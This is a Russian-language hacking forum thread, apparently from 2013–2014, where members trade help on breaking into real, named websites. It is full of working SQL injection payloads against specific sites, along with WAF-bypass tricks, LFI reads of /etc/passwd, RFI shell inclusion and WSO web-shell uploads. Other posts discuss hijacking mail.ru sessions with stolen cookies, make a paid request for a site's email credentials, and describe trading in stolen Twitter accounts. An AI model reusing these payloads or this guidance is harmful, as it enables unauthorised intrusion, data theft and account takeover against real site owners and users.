есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка.
может быть кто нибудь сталкивался с этим зверем и есть решение?
судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются
ХЭЭЭЛППП МИ!!!
p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
psihoz26
14.12.2013, 02:55
Code:
https://e-pay.by/https://e-pay.by/?invaliduser
https://e-pay.by/https://e-pay.by/
https://e-pay.by/https://e-pay.by/news?page=9
что это такое?
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
User lormedi_askort already has more than 'max_user_connections' active connections...
site.com/?item_id=5762+union+select+1,file_priv,3,4+from+my sql.user+where+user=lormedi_askort+--+
winstrool
14.12.2013, 19:07
MrKloud said:
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
site.com/?item_id=5762+union+select+1,file_priv,3,4+from+my sql.user+where+user=0x6C6F726D6564695F61736B6F7274 +--+
winstrool said:
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
То же самое.
zombak18
14.12.2013, 20:15
Как можно записать, чтобы значение было больше определнного..
К примеру where value=больше50
Что то понять не могу как это записать
zombak18 said:
Как можно записать, чтобы значение было больше определнного..
К примеру where value=больше50
Что то понять не могу как это записать
Тебе сюда (http://festival.1september.ru/articles/569979/)
zombak18
14.12.2013, 20:49
eclipse said:
Тебе
сюда (http://festival.1september.ru/articles/569979/)
догадался после того, как отправил здесь сообщение
zombak18 said:
догадался после того, как отправил здесь сообщение
+++ Молодец, прогрессируешь!
winstrool
15.12.2013, 14:43
MrKloud said:
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
winstrool said:
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
MrKloud said:
То же самое.
Посмотрел скуль в личке, все просто))) там просто нет доступа к mysql.user, по этому и нет файловых привилегий! модераторы, почистите от оффтопа
Есть у меня ссылка одна, там есть sql injection, раскрутил, узнал имена бд, лезу в бд а там какие-то тех. данные и больше ничего.
На самом сайте есть форма авторизации для зареганых пользователей, а вот куда ихние данные могут записываться?
GhostW said:
Есть у меня ссылка одна, там есть sql injection, раскрутил, узнал имена бд, лезу в бд а там какие-то тех. данные и больше ничего.
На самом сайте есть форма авторизации для зареганых пользователей, а вот куда ихние данные могут записываться?
либо плохо искал, либо из файла
qaz said:
либо плохо искал, либо из файла
а к файлу как можно доступ получить? или хотя бы узнать где он?
GhostW said:
а к файлу как можно доступ получить? или хотя бы узнать где он?
если файл прив нету то никак
qaz said:
если файл прив нету то никак
Необязательно, можно попробовать load_file('/etc/passwd'), если сработает можно попробовать прочитать конфиги мускула и тд
а вот такая ошибка
MySQL SELECT error: SELECT command denied to user 'user'@'localhost' for table 'user'
так понимаю file_priv не увидишь Y или N , для этого еще должно быть разрешение у данного пользователя на чтение таблицы mysql.user
hpol said:
а вот такая ошибка
MySQL SELECT error: SELECT command denied to user 'user'@'localhost' for table 'user'
так понимаю file_priv не увидишь Y или N , для этого еще должно быть разрешение у данного пользователя на чтение таблицы mysql.user
такая ошибка означает что у пользователя user@localhost нет прав для доступа к таблице user и file_priv не увидите
Здравствуйте, помогите раскрутить скулю на mssql.
При запросе:
http://site.com/page/test_list.html?page=(select%20db_name())
- выводит имя БД
http://site.com/page/test_list.html?page=user
Выдаёт:
Warning: mssql_query() [function.mssql-query]: message: Conversion failed when converting the nvarchar value 'fhlweb' to data type int. (severity 16) in D:\www\site_html\page\test_page_type1.inc.php on line 269
на кавычку выдаёт следующее:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '-1)*100 + 1 AND \'. (severity 15) in D:\www\site_html\page\test_page_type1.inc.php on line 269
_______
Подскажите что можно сделать?
помогите раскрутить
Code:
http://www.zarya-poltavka.ru/item.asp?id=4807
кажысь там mssql но что-то никак не могу раскрутить...
kingbeef
17.12.2013, 01:20
GhostW said:
помогите раскрутить
Code:
http://www.zarya-poltavka.ru/item.asp?id=4807
кажысь там mssql но что-то никак не могу раскрутить...
http://www.zarya-poltavka.ru/item.asp?id=4807%20or%201=(select%20system_user)--
kingbeef said:
http://www.zarya-poltavka.ru/item.asp?id=4807%20or%201=(select%20system_user)--
Как-то всё просто получилось ... Спасибо, впредь буду более внимательным...
Уважаемые! Столкнулся с проблемкой по PHP инъекции.
Залил веб-шелл(P.A.S) на бесплатный хостинг(таймвеб). При попытке открыть ссылку на шелл в браузере - открывает. Но когда пробую поставить в адрес изучаемого сайта, то ошибка:
Warning: require_once() [function.require-once]: Filename cannot be empty in /home/content/l/e/o/leoarts/html/links/show.php on line 18
Fatal error: require_once() [function.require]: Failed opening required '' (include_path='.:/usr/local/php5/lib/php') in /home/content/l/e/o/leoarts/html/links/show.php on line 18
Линк:
http://links.leoartz.com/show.php?id=concept&lang=ru
MrKloud said:
Уважаемые! Столкнулся с проблемкой по PHP инъекции.
Залил веб-шелл(P.A.S) на бесплатный хостинг(таймвеб). При попытке открыть ссылку на шелл в браузере - открывает. Но когда пробую поставить в адрес изучаемого сайта, то ошибка:
Линк:
Если ты про параметр "lang", то там php-inj нет, просто кривовато написан скрипт. Он похоже сверяется со списком допустимых языков и если есть такой, то инклюдит языковой файл, если нет, то пытается заинклюдить пустую строку, но так как такого файла нет, то ошибка.
sav77 said:
помогите раскрутить.
pb[antigoogle]kaybo1[antigoogle]com/rank/personal_list.html?page=
(select+max(table_name)+from+(select+top+1+table_n ame+from+information_schema.tables+where+table_nam e+not+in+(select+top+1+table_name+from+information _schema.tables+order+by+table_name)+order+by+table _name)a)
Читайте (https://rdot.org/forum/showthread.php?t=826)
Ben Franc
20.12.2013, 11:03
Доброго времени суток, уважаемые.
Есть сайт io.ua. Когда вводишь union в, например, поле имени или пароля, то выкидывает на пустую страницу:
http://edit.io.ua/login.php?inick=union&ipass1=1
Подобное же наблюдается когда вводишь union в поле пароля к закрытому альбому.
Попытки как-нибудь обнаружить вручную уязвимость по разным мануалам, выложенным в сети ни к чему не привели. Также Netsparker после скана ничего толкового не выдал. Хотя это всё и не показатель - я нуб нубом в этом, а автоматизация и так понятно что не всегда верна.
Вопрос в том, является ли то, что выдается пустая страница сигналом, что есть уязвимость или же это у них стоит фильтр на union?
Ben Franc said:
Доброго времени суток, уважаемые.
Есть сайт io.ua. Когда вводишь union в, например, поле имени или пароля, то выкидывает на пустую страницу:
Подобное же наблюдается когда вводишь union в поле пароля к закрытому альбому.
Попытки как-нибудь обнаружить вручную уязвимость по разным мануалам, выложенным в сети ни к чему не привели. Также Netsparker после скана ничего толкового не выдал. Хотя это всё и не показатель - я нуб нубом в этом, а автоматизация и так понятно что не всегда верна.
Вопрос в том, является ли то, что выдается пустая страница сигналом, что есть уязвимость или же это у них стоит фильтр на union?
На этом сайте практически везде, где можно использовать union, фильтр не позволяет, наоборот - вывода нет. Крутите если хотите, может что-то и получится)
Code:
http://io.ua/c14/u/Kiev. Nakoenec-to vypal sneg!/'or(1=(if(mid(version(),1,1)=5,1,0)))or'
Blind
mazaxaka
20.12.2013, 19:29
нужна помощь. есть сайт один, двиг дле, есть доступ к бд.могу дать любому юзеру админа, но на site.ru/admin.php стоит htpasswd
2 вопроса. как обойти хтпас и как раскрыть пути , возможно получится залить шел через бд
goodmaer
20.12.2013, 21:45
mazaxaka said:
нужна помощь. есть сайт один, двиг дле, есть доступ к бд.могу дать любому юзеру админа, но на site.ru/admin.php стоит htpasswd
2 вопроса. как обойти хтпас и как раскрыть пути , возможно получится залить шел через бд
Искать в гугле/бинге ошибки по соседям
Просканировать стандартные пути
В базе часто можно найти полные пути
Если есть пхпмайадмин возможно в нем есть баги(в 3.5.8 вообще шел залить можно)
Если file_priv=y есть попробовать прочитать логи
И бывало что мог каталог прочитать LOAD_FILEом
mazaxaka
20.12.2013, 22:25
goodmaer said:
Искать в гугле/бинге ошибки по соседям
Просканировать стандартные пути
В базе часто можно найти полные пути
Если есть пхпмайадмин возможно в нем есть баги(в 3.5.8 вообще шел залить можно)
Если file_priv=y есть попробовать прочитать логи
И бывало что мог каталог прочитать LOAD_FILEом
искал соседей разными сервисами пишет соседей нету.
пхпадмин версии 2.11.8
права файлов прочитать чтото не получается. не могу найти где. и пути не могу раскрыть
через бд могу на страници вставлять нтмл\джаву
mazaxaka said:
права файлов прочитать чтото не получается. не могу найти
что значит не получается? ошибку пишет? какую?
mazaxaka
20.12.2013, 22:42
qaz said:
что значит не получается? ошибку пишет? какую?
пробую так
select user,host,file_priv from mysql.user where user="юзер";
ответ
#1142 - SELECT command denied to user 'юзер'@'localhost' for table 'user'
mazaxaka said:
пробую так
select user,host,file_priv from mysql.user where user="юзер";
ответ
#1142 - SELECT command denied to user 'юзер'@'localhost' for table 'user'
а нутак прав нет, посмотри, мб в БД есть другие сайты через которые можно залится
mazaxaka
21.12.2013, 02:45
qaz said:
а нутак прав нет, посмотри, мб в БД есть другие сайты через которые можно залится
бд только етого дле сайта. соседей на ипе нету, могу через бд на страници вставлять html\java ,вся проблема что поставили htpasswd на админку.
ето я так понял нету прав на запись. а как проверить на чтение ?
mazaxaka
21.12.2013, 03:41
OxoTnik said:
После авторизаций в htpasswd сессия хранится в куках не?
не это я к чему, думаю раз ты можешь делать запросы в БД с html может кукисы просто спиздишь...
с его сессией может и прокатит
а как кукисы то стянуть. пару К страниц через бд править не охота)
а если прав на запись нету. лоад_файл в пхпмайадмине. тоже не прокатит?
mazaxaka
21.12.2013, 04:23
OxoTnik said:
непрокатит.
то есть вообще нету вариантов узнать htpasswd или залить скрипт?
а можно както через пхпмайадмин найти все значения в базе и заменить на другие?
Stronger
22.12.2013, 00:31
существуют ли уязвимости у asp (а именно форма входа login.asp)?
shell_c0de
22.12.2013, 01:24
Stronger said:
существуют ли уязвимости у asp (а именно форма входа login.asp)?
написать тебе бажный скрипт ?
Stronger
22.12.2013, 09:59
написать тебе бажный скрипт ?
этот вопрос с сарказмом?)
Вообщем,существует сайт с движком NetSchool (4.50 версия). Мне нужно зайти с админского аккаунта. есть какие нибудь уязвимости,и,если можно,написать поподробнее о них.
При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?
kingbeef
22.12.2013, 23:34
BOSS said:
При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?
Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.
kingbeef said:
Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.
Как их посмотреть? Где?
winstrool
23.12.2013, 06:39
BOSS said:
Как их посмотреть? Где?
немного поможет разобраться:
https://forum.antichat.net/thread397144.html
Помогите найти что нибудь для vbulletin 3.8.7 pl3. Про сплойт через EggAvatar - знаю, а кроме этого ничего не нашёл.
Подскажите, кто знает. Есть онлайн проект на флеше. Нашел форму которая разрешает загрузку и вывод флеш контента пользователю. (как пример - личные сообщения пропускают и показывают всю флешку). С ActionScript знаком совсем мало. Можно сказать - вообще не знаком
Дайте пару советов, если можно с примерами хотя-бы алерта (если это возможно вообще в AS). Можно в ЛС, у кого спортивный интерес) (в проекте более миллиона участников).
Cennarios
25.12.2013, 19:14
Быть может, у кого появятся какие идеи как реализовать.
Валидное условие:
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+order+by+1--+
Валидное условие:
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=1--+
Невалидное условие:
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=0--+
Неполучилось провести объединение через union, ни через blind конструкции.
условие
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' or 5=find_in_set(substring((SELECT version()),1,1),'1,1,2,3,4,5')--+ не срабатывает, не срабатывает даже substring в чистом варианте виде +or+5=substring(version(),1,1)--+
Если не трудно, то в личку если есть конкретные варианты. С меня бонус
P.S. Походу где-то рубиться запятая не давая использовать функции соотв
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+ substring((@@version)+from+1+for+1)=4+--+ FALSE
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+ substring((@@version)+from+1+for+1)=5+--+ TRUE
winstrool
25.12.2013, 23:56
Покрутил в сторону join(), но адекватного вывода не нашел((
http://videos.webpronews.com/video/playlist.php?movie_name=-ses_jcolborn'+and+1=1+union+(select+*+from+(select +1)+a1+join(select+2)+a2+join(select+3)+a3+)+--+
пока что как вариант написать сплоит под блинд, завтра если будет возможность еще покручу, скуль интересная)
Cennarios
26.12.2013, 00:31
Вот собственно решение найденое мной:
?varparam=value'+or+1='s'+IN+('a')+OR+1='s'+IN+('b ')+OR+1='s'+IN+('s')--+
через OR объединяем чарсеты и строим условие )
KolosJey
26.12.2013, 00:38
Вывод.
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' and 1=2 union select * from (select "ses_jcolborn' and 1=2 union select * from (select version())d join (select 2)e join (select 3)f join (select 4)g join (select 5)h--+")a join (select 2)b join (select 3)c limit 1--+
Если нужны запятые можно в хекс.
winstrool said:
завтра если будет возможность еще покручу
что бы что то покрутить, нужно понимать хотя бы как оно работает
winstrool said:
movie_name=
-
ses_jcolborn
что это за минус, чудо? )
WallHack
27.12.2013, 12:13
Сканировал сайт нашёл Blind SQL Injection
Сайт http://binker.org.ua/reg.html
Post запрос code=1&email=sample@email.tst®_referer=0®name=-1' or 4 = '5
Можно ли её раскрутить ?
WallHack said:
Сканировал сайт нашёл Blind SQL Injection
Сайт http://binker.org.ua/reg.html
Post запрос code=1&email=sample@email.tst®_referer=0®name=-1' or 4 = '5
Можно ли её раскрутить ?
скорее всего стоит не Mysql, дальше не стал крутить
WallHack
27.12.2013, 16:03
er9j6@
Вот база данный этого скрипта http://rghost.ru/51238267
Товарищи добрый день. Мне нужно протестировать пару сканеров. Не подскажите уязвимые сервисы для Винд Сервер 2003?
imprenko
29.12.2013, 17:27
Приветствую всех.
есть скуль есть права могу читать и записывать файлы
но файлы php txt и т.д не создаются только html
можно создать:
1.php.html но он будит пуст
2.txt.html будит с кодом но с таким
3.html будит с кодом но с таким
почему то 2 раза записывается в файл
выполнение команд видимо не работает из за этого
позаливал кучу разных шеллов и все отображаются коряво php во всех не работают
залил аплоадер тоже с помощью него не заливают файлы никакие
подскажите как сделать правильно чтоб работали команды
imprenko
29.12.2013, 18:09
OxoTnik said:
Бекдор не работает потому что в формате html? а не потому что записывается несколько раз в файл
ага точно.
а что можно сделать ?
imprenko
29.12.2013, 18:34
OxoTnik said:
ну прочти конфиги БД и подключись к примеру
пароли знаю.
я насчет шелла возможно как нить залить через скулю?
Massay said:
Помогите пожалуйста розкрутить sql инъекцию
С чего ты взял что там что-то есть?
GhostW said:
С чего ты взял что там что-то есть?
Вывод ошибки есть.
Massay said:
Вывод ошибки есть. Только тогда когда вы авторизируетесь на сайте.
Без авторазции запрос - http://5.firepic.org/5/images/2013-12/29/3l1jmnodztsg.png
С авторизацию - http://5.firepic.org/5/images/2013-12/29/q8wgot3vlbg6.png
У меня в браезере что с вашей сессией, что без - кидает на второй скрин, ничего не меняется. Попробуйте выполнить
777") and extractvalue(1,concat(1,user()))=("1
Там вероятно update используется, хотя возможно и простая выборка.
Inoms said:
777") and extractvalue(1,concat(1,user()))=("1
Там вероятно update используется, хотя возможно и простая выборка.
DB Error
You have an error in your SQL syntax;
Massay said:
DB Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and extractvalue(1,concat(1,user()))=("1")' at line 1
чем передаешь POST-запросы? Не могу добиться выводы ошибки в Http Analyzer
POST запрос передаю через плагин в Мозиле, HackBar.
*Удалено по просьбе автора*
imprenko
30.12.2013, 20:05
sqlmap вывел таблици
только вот кодировка непонятная не могу в нормальный вид вывести
помогите пожалуйста....
back-end DBMS: Microsoft Access
Database:
[2 tables]
+--------------------------------------------------------------+
| {AIP|�h3�I$��0?QE?2§4%��H87H�FE\n>p |
| {AIP|\x154%\x12\x11H87H\x1fFE\\n>p |
+--------------------------------------------------------------+
OxoTnik said:
В общем атака посредством XSS
фильтры
Фильтруется побел
Фильтруется +
Ограничение на количество символов до 140 символов
Пробовал кодировать чтобы убрать пробелы, но не вписывался в количество символов
сам запрос вписывается в 36 символов, но присутствует 1 пробел
как обойти?
Вставка в параметр или в тело?
PHP:
30 Символов. Если найти 5-буквенный домен, это 29. Может быть как-то еще закрывающий тег можно опустить.
P.S. Два слэша означают использование протокола сайта(HTTPS при HTTPS и HTTP при HTTP).
http://www.btlt.ru/comp/index.php?a=p&cat=8 and substring(@@version,1,1)=5
а дальше никак...!
окажите помощь!
er9j6@ said:
Вбиваешь в Havij, и крутишь
5.1.70-log
так неинтересно!
Always said:
так неинтересно!
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
Inoms said:
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
но мне тот линк интересен, как его крутануть?!
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user(),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
er9j6@ said:
так не пробовал выводить?
http://www.btlt.ru/comp/index.php?a=f&id=1+union+select+1,2,table_name+fRoM+information_ schema.tables+limit+41,1+--+
меня интересует именно мой вопрос
qaz said:
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user(),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
Вызов функций в limit'е ? lol
Привет всем, есть инъекция вида
http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.
Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.
OxoTnik said:
И что значит
автоматизировать подбор limit
" if author else f"
OxoTnik said:
И что значит
автоматизировать подбор limit
Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.
Или можно что-то сделать с sqlmap?
Так что, мне никто не поможет
kingbeef
05.01.2014, 17:33
Фильтруется table_name . Что сделать можно?
http://www.rubo.ru/%25D1%2580%25D0%25BE%25D1%2581%25D1%2581%25D0%25B8 %25D1%258F/multday.ru'or(ExtractValue(1,concat(0x3a,(select(t able_name)from(information_schema.tables)limit/**/0,1))))='1
kingbeef said:
Фильтруется table_name . Что сделать можно?
подзапросы используй
chapters,flags,lands,menu,menu_out,roots,screens,s ites,stat,val,words
Просканировал с помощью sqlmap один игровой сервер
sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"
в логе написало:
......
[16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'
.....
[16:51:10] [WARNING] POST parameter 'position' is not injectable
[16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
.....
Тестировал несколько раз.
Просмотрев лог запросов увидел что срабатывало на
position=-6458' OR (3053=8541)
position=0%22%29%20AND%206045%3D4434%20AND%20%28%2 2sLat%22%3D%22sLat
position=0%20AND%205338%3D7364
Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).
Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access или нет?)
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
Always said:
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
попугай said:
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
есть!
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
x.Com said:
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
ищи админку
psihoz26
08.01.2014, 04:14
как крутить подобное ?
Code:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
psihoz26 said:
как крутить подобное ?
Code:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
/etc/passwd%00 или /etc/passwd[////4096////]
Konqi said:
ищи админку
дык найти не могу, второй день сижу уже, все перепробывал
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
kingbeef
08.01.2014, 23:35
Xvir said:
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('PrValues','SAP_Param5'))--
Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "
and extractvalue(rand(),concat(0x3a,(select concat(0x3a,pass) from server.users limit 1,1))))--
"
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
Да. но скрипт Hash Id эго тип хеша определить не может.
46f94c8de14fb36680850768ff1b7f2
Massay said:
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--
and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--
K800 said:
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
Как использовать эту уязвимость ? http://vagosec.org/2013/12/wordpress-rce-exploit/
websheff
11.01.2014, 00:42
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
kingbeef
11.01.2014, 01:08
websheff said:
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
websheff
11.01.2014, 01:48
kingbeef said:
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
shell_c0de
11.01.2014, 01:56
websheff said:
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
Кто сколько успеет собрать, всем хакерам которые имеют эту багу распределены время сбора, акки бывают и свежие и старореги!11
websheff
11.01.2014, 02:01
shell_c0de said:
Кто сколько успеет собрать, всем хакерам которые имеют эту багу распределены время сбора, акки бывают и свежие и старореги!11
Да, это заметил что микс. А как по странам фильтруют то?
Хм и где можно найти этих хакеров/приобрести долю/мониторить сосстояние бага?
kingbeef
11.01.2014, 02:07
websheff said:
Да, это заметил что микс. А как по странам фильтруют то?
Хм и где можно найти этих хакеров/приобрести долю/мониторить сосстояние бага?
При доступу к БД сайта можно выводить аккаунты по странам и кол-во фолловеров. Стукни продавцам акков, они может продадут или посоветуют у кого купить.
websheff
11.01.2014, 02:18
kingbeef said:
При доступу к БД сайта можно выводить аккаунты по странам и кол-во фолловеров. Стукни продавцам акков, они может продадут или посоветуют у кого купить.
Спасибо, попробую. Сомневаюсь что поделятся хлебушком, но рискнем
zombak18
11.01.2014, 21:18
Загадка небольшая
Есть 3 сайта 1 человека.. на них стоят игровые сервера(ну сайты для регистрации, изменения пароля и т.п..клиентские игры..причем разные) есть файл login.aspx(но он не для входа.. вроде бы)
В одном из них
test10a|9cbea4ebc53dfb893f124932246b60ec|12341234
В других 1|test10a|120971264|
Может быть кто-то знает для чего это вообще нужно?(
ребят помогите плз нашел LFI нашел error_log , обратился к сайту site.com/dir/file.css делаю инклуд лога но в самом логе записывается вот так ss/icon.css%3C?php%20phpinfo();%20?%3E.
как побороть эту кодировку ? ( чтоб нормально записывало ?
zombak18 said:
Загадка небольшая
Есть 3 сайта 1 человека.. на них стоят игровые сервера(ну сайты для регистрации, изменения пароля и т.п..клиентские игры..причем разные) есть файл login.aspx(но он не для входа.. вроде бы)
В одном из них
test10a|9cbea4ebc53dfb893f124932246b60ec|12341234
В других 1|test10a|120971264|
Может быть кто-то знает для чего это вообще нужно?(
похоже на логины и пароли
Dexec said:
ребят помогите плз нашел LFI нашел error_log , обратился к сайту site.com/dir/file.css делаю инклуд лога но в самом логе записывается вот так ss/icon.css%3C?php%20phpinfo();%20?%3E.
как побороть эту кодировку ? ( чтоб нормально записывало ?
это твой фаерфокс урл кодирует, открой через другой браузер
zombak18
12.01.2014, 00:46
qaz said:
похоже на логины и пароли
Ясенпень похоже.. но не могу понять для чего и куда.. Не для сайта точно
kingbeef
12.01.2014, 02:23
zombak18 said:
Ясенпень похоже.. но не могу понять для чего и куда.. Не для сайта точно
Тебе сюда
http://vanga.ru/forum/
mazaxaka
12.01.2014, 10:04
в общем детский вопрос по рфи
пример рфи в джумле
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
как должен выглядеть путь к шелу?
http://site.ru/shell.txt
http://site.ru/shell.txt?
http://site.ru/shell.php
http://site.ru/shell.php?
http://site.ru/shell.txt%00
http://site.ru/shell.php%00
mosConfig_absolute_path так и должно быть или там нужно что то другое вписывать?
Если RFI и все зависимости удовлетворены, то удобнее всего http://site.ru/shell, а в конце ты прописываешь расширение, с которым идет запрос. Посмотреть его можно или в исходниках, или в логах.
-=Cerberus=-
13.01.2014, 16:25
Народ подскажите в чем беда.
использую SQLMAP, язва такого рода
back-end DBMS: Microsoft SQL Server 2012
Place: GET
Parameter: sku
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: sku=-2896' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(111)+CHAR(113)+ CHAR(121)+CHAR(73)+CHAR(87)+C
HAR(122)+CHAR(67)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR (82)+CHAR(79)+CHAR(113)+CHAR(103)+CHAR(119)+CHAR(1 14)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sku=USUSUSU'; WAITFOR DELAY '0:0:5'--
имена баз данных достает нормально, таблицы с текущей тоже все ок, колонки с таблицы ок, а вот данные не хочет тянуть!
так пытается достать инфу
sku=USUSUSU'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM dbname.dbo.Users),1,1))>1) WAITFOR DELAY '0:0:5'--
в чём может быть косяк??? заранее благодарен за ответы!
фильтруется просто слово select на сайте. т.е даже если www.site.com/asfselect123 попробовать ввести, он покажет что сайт хотят взломать. Как попробовать обойти можно?
kingbeef
13.01.2014, 18:20
SeLeCt
SEselectECT
Br@!ns said:
фильтруется просто слово select на сайте. т.е даже если www.site.com/asfselect123 попробовать ввести, он покажет что сайт хотят взломать. Как попробовать обойти можно?
Попробуйте принудительно все символы в url-encode загнать, это может сработать, заивист от типа ids\waf. Как вариант, поиграться с регистром. Или же вообще отойти от union select.
Также можно попробовать определить waf\ids и глянуть на его исходники\стандартные правила. Есть тулза WAFW00F для этого.
-=Cerberus=-
13.01.2014, 23:20
или SQLMAP опция --check-waf
psihoz26
14.01.2014, 17:45
Вопрос касательно хсс на маилру
украл я куки к примеру лежат они у меня на сниффере
Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика
После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся...
Как я понял в маилру главная кука отвечающая за вход Mpop
меняю mpop в опере и открываю маилру
и что же вы думаете? зашел? - НЕТ
просит ввести заново пароль при этом кука больше не работает!!
Какже зайти на почту с чужих кук?
psihoz26 said:
Вопрос касательно хсс на маилру
украл я куки к примеру лежат они у меня на сниффере
Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика
После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся...
Как я понял в маилру главная кука отвечающая за вход Mpop
меняю mpop в опере и открываю маилру
и что же вы думаете? зашел? - НЕТ
просит ввести заново пароль при этом кука больше не работает!!
Какже зайти на почту с чужих кук?
